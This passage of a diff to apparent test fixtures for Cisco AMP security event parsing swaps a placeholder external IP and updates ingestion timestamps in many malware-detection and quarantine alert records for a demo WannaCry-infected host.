Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419275394960064602\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225558,\"description\":\"Delete pending\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", "code": "2164260880", "kind": "alert", "action": "Quarantine Failure", @@ -6279,7 +6279,7 @@ } ], "connector_guid": "test_connector_guid", - "external_ip": "8.8.8.8" + "external_ip": "81.2.69.144" }, "file": { "disposition": "Malicious", @@ -6324,7 +6324,7 @@ "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" ], "ip": [ - "8.8.8.8", + "81.2.69.144", "10.10.10.10" ] }, 
@@ -6334,8 +6334,8 @@ }, "event": { "severity": 2, - "ingested": "2021-09-30T00:14:44.025425605Z", - "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419275399255032000,\"timestamp\":1610645991,\"timestamp_nanoseconds\":281000000,\"date\":\"2021-01-14T17:39:51+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419275394960064601\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225558,\"description\":\"Delete pending\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", + "ingested": "2021-12-09T13:35:39.764453700Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419275399255032000,\"timestamp\":1610645991,\"timestamp_nanoseconds\":281000000,\"date\":\"2021-01-14T17:39:51+00:00\",\"event_type\":\"Quarantine 
Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419275394960064601\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225558,\"description\":\"Delete pending\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", "code": "2164260880", "kind": "alert", "action": "Quarantine Failure", @@ -6355,7 +6355,7 @@ } ], "connector_guid": "test_connector_guid", - "external_ip": "8.8.8.8" + "external_ip": "81.2.69.144" }, "file": { "disposition": "Malicious", @@ -6400,7 +6400,7 @@ "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" ], "ip": [ - "8.8.8.8", + "81.2.69.144", "10.10.10.10" ] }, 
@@ -6410,8 +6410,8 @@ }, "event": { "severity": 2, - "ingested": "2021-09-30T00:14:44.025427909Z", - "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419275399255032000,\"timestamp\":1610645991,\"timestamp_nanoseconds\":281000000,\"date\":\"2021-01-14T17:39:51+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419275394960064598\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225558,\"description\":\"Delete pending\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", + "ingested": "2021-12-09T13:35:39.764457800Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419275399255032000,\"timestamp\":1610645991,\"timestamp_nanoseconds\":281000000,\"date\":\"2021-01-14T17:39:51+00:00\",\"event_type\":\"Quarantine 
Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419275394960064598\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225558,\"description\":\"Delete pending\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", "code": "2164260880", "kind": "alert", "action": "Quarantine Failure", @@ -6431,7 +6431,7 @@ } ], "connector_guid": "test_connector_guid", - "external_ip": "8.8.8.8" + "external_ip": "81.2.69.144" }, "file": { "disposition": "Malicious", @@ -6476,7 +6476,7 @@ "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" ], "ip": [ - "8.8.8.8", + "81.2.69.144", "10.10.10.10" ] }, 
@@ -6486,8 +6486,8 @@ }, "event": { "severity": 2, - "ingested": "2021-09-30T00:14:44.025435026Z", - "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419275399255032000,\"timestamp\":1610645991,\"timestamp_nanoseconds\":281000000,\"date\":\"2021-01-14T17:39:51+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419275394960064600\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225558,\"description\":\"Delete pending\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", + "ingested": "2021-12-09T13:35:39.764462500Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419275399255032000,\"timestamp\":1610645991,\"timestamp_nanoseconds\":281000000,\"date\":\"2021-01-14T17:39:51+00:00\",\"event_type\":\"Quarantine 
Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419275394960064600\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225558,\"description\":\"Delete pending\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", "code": "2164260880", "kind": "alert", "action": "Quarantine Failure", @@ -6507,7 +6507,7 @@ } ], "connector_guid": "test_connector_guid", - "external_ip": "8.8.8.8" + "external_ip": "81.2.69.144" }, "file": { "disposition": "Malicious", @@ -6566,7 +6566,7 @@ "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" ], "ip": [ - "8.8.8.8", + "81.2.69.144", "10.10.10.10" ] }, 
@@ -6583,8 +6583,8 @@ }, "event": { "severity": 2, - "ingested": "2021-09-30T00:14:44.025438494Z", - "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419275399255032000,\"timestamp\":1610645991,\"timestamp_nanoseconds\":812000000,\"date\":\"2021-01-14T17:39:51+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.Variant:Gen.20gl.1201\",\"detection_id\":\"6419275399255031906\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"},\"parent\":{\"process_id\":3200,\"disposition\":\"Clean\",\"file_name\":\"cmd.exe\",\"identity\":{\"sha256\":\"17f746d82695fa9b35493b41859d39d786d32b23a9d2e00f4011dec7a02402ae\",\"sha1\":\"ee8cbf12d87c4d388f09b4f69bed2e91682920b5\",\"md5\":\"ad7b9c14083b52bc532fba5948342b98\"}}}}}", + "ingested": "2021-12-09T13:35:39.764467300Z", + "original": 
"{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419275399255032000,\"timestamp\":1610645991,\"timestamp_nanoseconds\":812000000,\"date\":\"2021-01-14T17:39:51+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.Variant:Gen.20gl.1201\",\"detection_id\":\"6419275399255031906\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"},\"parent\":{\"process_id\":3200,\"disposition\":\"Clean\",\"file_name\":\"cmd.exe\",\"identity\":{\"sha256\":\"17f746d82695fa9b35493b41859d39d786d32b23a9d2e00f4011dec7a02402ae\",\"sha1\":\"ee8cbf12d87c4d388f09b4f69bed2e91682920b5\",\"md5\":\"ad7b9c14083b52bc532fba5948342b98\"}}}}}", "code": "1090519054", "kind": "alert", "action": "Threat Detected", @@ -6606,7 +6606,7 @@ } ], "connector_guid": "test_connector_guid", - "external_ip": "8.8.8.8" + "external_ip": "81.2.69.144" }, "file": { "parent": { 
@@ -6667,7 +6667,7 @@ "5ff465afaabcbf0150d1a3ab2c2e74f3a4426467" ], "ip": [ - "8.8.8.8", + "81.2.69.144", "10.10.10.10" ] }, 
@@ -6684,8 +6684,8 @@ }, "event": { "severity": 2, - "ingested": "2021-09-30T00:14:44.025440745Z", - "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419275399255032000,\"timestamp\":1610645991,\"timestamp_nanoseconds\":235000000,\"date\":\"2021-01-14T17:39:51+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.Variant:Gen.20gl.1201\",\"detection_id\":\"6419275399255031905\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\",\"sha1\":\"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467\",\"md5\":\"84c82835a5d21bbcf75a61706d8ab549\"},\"parent\":{\"process_id\":2708,\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}}", + "ingested": "2021-12-09T13:35:39.764472800Z", + "original": 
"{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419275399255032000,\"timestamp\":1610645991,\"timestamp_nanoseconds\":235000000,\"date\":\"2021-01-14T17:39:51+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.Variant:Gen.20gl.1201\",\"detection_id\":\"6419275399255031905\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\",\"sha1\":\"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467\",\"md5\":\"84c82835a5d21bbcf75a61706d8ab549\"},\"parent\":{\"process_id\":2708,\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}}", "code": "1090519054", "kind": "alert", "action": "Threat Detected", @@ -6707,7 +6707,7 @@ } ], "connector_guid": "test_connector_guid", - "external_ip": "8.8.8.8" + "external_ip": "81.2.69.144" }, "file": { "parent": { 
@@ -6757,7 +6757,7 @@ "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" ], "ip": [ - "8.8.8.8", + "81.2.69.144", "10.10.10.10" ] }, 
@@ -6774,8 +6774,8 @@ }, "event": { "severity": 2, - "ingested": "2021-09-30T00:14:44.025443013Z", - "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419275399255032000,\"timestamp\":1610645991,\"timestamp_nanoseconds\":172000000,\"date\":\"2021-01-14T17:39:51+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.Variant:Gen.20gl.1201\",\"detection_id\":\"6419275399255031904\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Windows\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", + "ingested": "2021-12-09T13:35:39.764478100Z", + "original": 
"{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419275399255032000,\"timestamp\":1610645991,\"timestamp_nanoseconds\":172000000,\"date\":\"2021-01-14T17:39:51+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.Variant:Gen.20gl.1201\",\"detection_id\":\"6419275399255031904\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Windows\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", "code": "1090519054", "kind": "alert", "action": "Threat Detected", @@ -6797,7 +6797,7 @@ } ], "connector_guid": "test_connector_guid", - "external_ip": "8.8.8.8" + "external_ip": "81.2.69.144" }, "file": { "disposition": "Malicious", @@ -6838,7 +6838,7 @@ "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" ], "ip": [ - "8.8.8.8", + "81.2.69.144", "10.10.10.10" ] }, 
@@ -6848,8 +6848,8 @@ }, "event": { "severity": 2, - "ingested": "2021-09-30T00:14:44.025445273Z", - "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419275399255032000,\"timestamp\":1610645991,\"timestamp_nanoseconds\":281000000,\"date\":\"2021-01-14T17:39:51+00:00\",\"event_type\":\"Threat Quarantined\",\"event_type_id\":553648143,\"detection_id\":\"6419275394960064599\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", + "ingested": "2021-12-09T13:35:39.764482100Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419275399255032000,\"timestamp\":1610645991,\"timestamp_nanoseconds\":281000000,\"date\":\"2021-01-14T17:39:51+00:00\",\"event_type\":\"Threat 
Quarantined\",\"event_type_id\":553648143,\"detection_id\":\"6419275394960064599\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", "code": "553648143", "kind": "alert", "action": "Threat Quarantined", @@ -6869,7 +6869,7 @@ } ], "connector_guid": "test_connector_guid", - "external_ip": "8.8.8.8" + "external_ip": "81.2.69.144" }, "file": { "disposition": "Malicious", @@ -6910,7 +6910,7 @@ "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" ], "ip": [ - "8.8.8.8", + "81.2.69.144", "10.10.10.10" ] }, 
@@ -6920,8 +6920,8 @@ }, "event": { "severity": 2, - "ingested": "2021-09-30T00:14:44.025451903Z", - "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419275394960065000,\"timestamp\":1610645990,\"timestamp_nanoseconds\":423000000,\"date\":\"2021-01-14T17:39:50+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419275394960064597\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225558,\"description\":\"Delete pending\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", + "ingested": "2021-12-09T13:35:39.764486800Z", + "original": 